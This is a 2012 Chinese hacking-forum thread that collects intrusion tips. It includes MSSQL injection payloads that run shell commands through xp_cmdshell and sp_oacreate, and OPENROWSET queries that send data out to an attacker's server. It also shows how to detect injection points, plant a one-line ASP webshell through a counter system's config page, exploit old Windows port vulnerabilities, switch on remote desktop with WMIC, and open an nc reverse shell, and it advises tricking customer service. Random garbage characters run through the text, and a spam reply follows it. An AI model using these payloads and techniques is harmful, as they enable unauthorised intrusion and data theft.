找回密码
 立即注册
查看: 4403|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关& z, j# i" X  Z9 q1 W
6 D3 h, @- d& p: d6 y
7 x; i; E. F6 K7 O  |2 k8 O
SA点数据库分离搞法+语句:
6 [! @/ z' L2 e" @6 p/ z
: W$ `0 D% N. R: {$ ?: q注射点不显错,执行下面三条语句页面都返回正常。
+ ~1 O( z/ u& I2 k. Sand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')/ G: I9 r6 Q. z& \9 l7 @% c
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
" L. o; v- g0 E" qand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'): w+ S- w5 I3 S1 K  D9 q+ r: y# c
可以列目录,判断系统为2000,web与数据库分离
* y5 W' I+ P3 u3 Q3 B0 @$ y: t遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。( O( d; r* m$ Y" u6 N: o/ O
在注射点上执行( q+ E# e  S0 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--5 Y2 g& J0 x, E+ t+ a6 d6 |
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP+ n- B5 u0 a/ _7 M2 W. I
还有我用NC监听得其他端口都没有得到IP。
5 y- a% ]( H* B5 c3 S& ^) B
2 y9 x+ r! |2 U6 {: n0 j4 N! D通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
. b3 v. C3 h8 g7 X4 s'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
: y" ]- X; i2 q
. x, W: q; F9 I- Z;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
7 }+ B" n% q3 y$ }5 a! b
! D& L2 r& Y0 ]' L& p2 `! A现在就猜想是不是数据库是内网而且不能连外网。
$ H! `) J; F% X( Q+ p6 o* h8 f9 B. K, g$ O
% h8 c* _- G1 T( s9 j
access导出txt文本代码
- s6 g7 @. ?" @- Z, bSELECT * into [test.txt] in 'd:\web\' 'text;' from admin$ @+ b6 P3 Q  H+ H$ g5 I
% a, m- l. W0 u8 M
+ O5 ~3 A1 V: i* b

2 y" Q/ z7 X5 a2 a8 {* t4 y自动跳转到指定网站代码头
% H' b8 I" B- s7 Y9 a) Q* J( m7 N; _<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'># Z! h4 x- s/ K& a2 M: K$ n$ j: \
7 Q/ x% e% u& T5 R

2 e+ z8 Q3 y7 q" ^8 F% q% p入侵java or jsp站点时默认配置文件路径:
: [4 K0 F) o; _% E\web-inf\web.xml, K' U; O8 |* ~* J; m% u! t
tomcat下的配置文件位置:
5 B3 {% ^) A( u\conf\server.xml            (前面加上tomcat路径): ?5 b* _' \+ f1 v# Q
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml  d4 ~5 q& H( z) m/ k3 C
0 T( {& S6 K6 K. M% H  Q

$ Q  ~5 A8 u( K1 Z/ {# V4 W' R* \
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
& V  `9 O% ^9 M5 ?- }! J-1%23
) L$ A( @, ~3 y0 b3 W% M, w>
7 }! i( P; K. E<, @" Z6 t5 W+ `
1'+or+'1'='1
- O6 d' W2 V8 z; M! yid=8%bf6 r3 S$ m5 |& }' Z* L
; K7 V" t( S* Z1 X( x
全新注入点检测试法:
+ T) n/ ^/ d+ D/ _" K在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。3 w3 \8 t- m7 \: }( c
+ q2 ~+ h/ C9 L2 \; x* e  z8 g
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。5 D1 N% N0 E1 ~6 R
8 x. @8 h8 z6 \8 U1 Y% J
搜索型注入判断方法:; ^8 Q! p/ E6 Z9 S8 K
北京%' and '1'='1' and '%'='
: x% u/ |3 V% e& q5 p北京%' and '1'='2' and '%'='
/ U: I2 ~6 i  \* v/ n
- p; n0 i# z" r8 d, j3 G  @9 t1 Y+ _- u# i0 h6 X
COOKIES注入:
6 \8 T. j# O+ F1 L3 G
! r! z$ C2 G& d9 }$ Zjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
# a1 J0 C2 q) M6 O$ C& g" ]9 H' ]2 N% g5 g) M
2000专业版查看本地登录用户命令:& L, e, y/ K) t! n* L
net config workstation
" \- Y5 {) O# y" Y
0 Y4 u- k6 G4 m- Q; J
5 B) A" W0 g% _8 x" P2 C# T# R# F2003下查看ipsec配置和默认防火墙配置命令:6 w# k/ F2 m" l/ v- k1 v
netsh firewall show config/ w" I+ [' w  p1 v. ]- f; V
netsh ipsec static show all
& p- r& n2 @3 S' c$ t' T0 I3 a& k( B  d% w' U' b
不指派指定策略命令:* f$ r" c: _, f2 \
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
8 _( e; `2 Q$ h1 y9 ynetsh ipsec static show policy all  显示策略名, d9 `* b2 n1 ?2 ^) W2 G* q
$ O1 S1 N: w5 T* @: |3 k

5 R" I; u6 L! }猜管理员后台小技巧:
7 H) I$ f& M4 Z( d2 @5 G) o& d  hadmin/left.asp
" J2 \/ x) ]0 x" @7 l! M1 oadmin/main.asp1 w3 K1 m3 I$ _( u$ T
admin/top.asp
; ^8 I/ o5 p& o+ o3 J# U# m* oadmin/admin.asp ) U( u0 L5 O3 q1 ^# E  h0 ]
会现出菜单导航,然后迅雷下载全部链接4 R4 v0 g2 m6 |( b9 u/ {2 D& U

* u: `9 N. q- H6 Q6 j, Q
+ d6 [, _5 O& N5 s社会工程学:0 N' x6 g5 G; o% \& Q: n
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人( C  m* x) P3 [( o3 }
然后去骗客服
+ L/ c" T1 D0 \; F( M) |$ B/ E4 Z' o2 ~4 l# z
' K! H7 r9 _. g1 f2 _
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 3 J& e8 C6 I0 }# e. j
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
! `# c  a. f" k# g  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
6 H# X9 G& B9 |/ w9 e, p7 k
' M: u" Y+ a# I7 w* D
3 d. @! `3 s% q6 \  H0 O
+ ^- p4 v, E. X. `! B- r8 U6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)$ K0 v9 o2 X' v7 F5 H9 Z

* z* X6 o  U9 r9 @' N2 ^- D; G2 J, i$ a( B) d7 k$ q

4 A- X9 H# O% c  tCMD加密注册表位置0 h) t. l# a1 ]* T8 I
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor$ L( I# n3 }9 o: t3 N! E/ H$ n  C
AutoRun5 x. G& z; M! n8 |" p
$ D4 q( o* w% p+ c; m
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor7 f8 H, [& S) D2 y6 A6 s
AutoRun7 B) l+ o9 o' I3 p
& P2 G8 {0 e& @

+ ?+ [0 q% F2 ^7 c! ~在找注入时搜索Hidden,把他改成test
; s. {( G: C! C9 N! r$ [
6 z7 S# H  {  O3 u; `. `
2 o% i. k$ d$ C& ]+ A2 i/ {4 b) v" o: M  N, t+ [/ N/ N3 F
mstsc /v:IP /console $ `! _5 m" a4 s  i

/ `+ h) z* n8 j0 W
: S: q# u/ N6 n  n2 B; @* S一句话开3389:" W1 {- r5 q" N. S$ C" j

2 O; @$ v& \* D1 e+ @1 F最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
( g: i' n7 Y: h- @) y5 z! ^+ n# h6 T开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.' {/ n" L: K5 d6 Y2 o* w, r

0 P/ O# h* D$ H' d+ N/ c  Y/ {  q6 @. I+ R
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
1 {: _; }, T# g# QInsert into admin(user,pwd) values('test','test')
! x7 `5 k- I, p
. I0 H6 y3 m, N8 i
: G" ]" u9 H, U; U, ZNC反弹
( W5 Z* T: i) F( G) a* C先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
& K* G$ E3 f1 Q/ {然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
% G& r6 M- W0 o8 s: w0 E5 i9 G) ~( W, N* ^: Z5 b1 [1 l
1 R) g( [2 N5 J( W$ H. k3 v
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
/ q; y' b3 C/ y) E. \& ^( y+ I
8 H$ h  C+ j2 @1 C) t9 D有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
: S+ R& @5 {6 R+ E& f例如:
6 E9 r# l5 l5 D  [subst k: d:\www\ 用d盘www目录替代k盘
9 i0 O2 f: h9 zsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表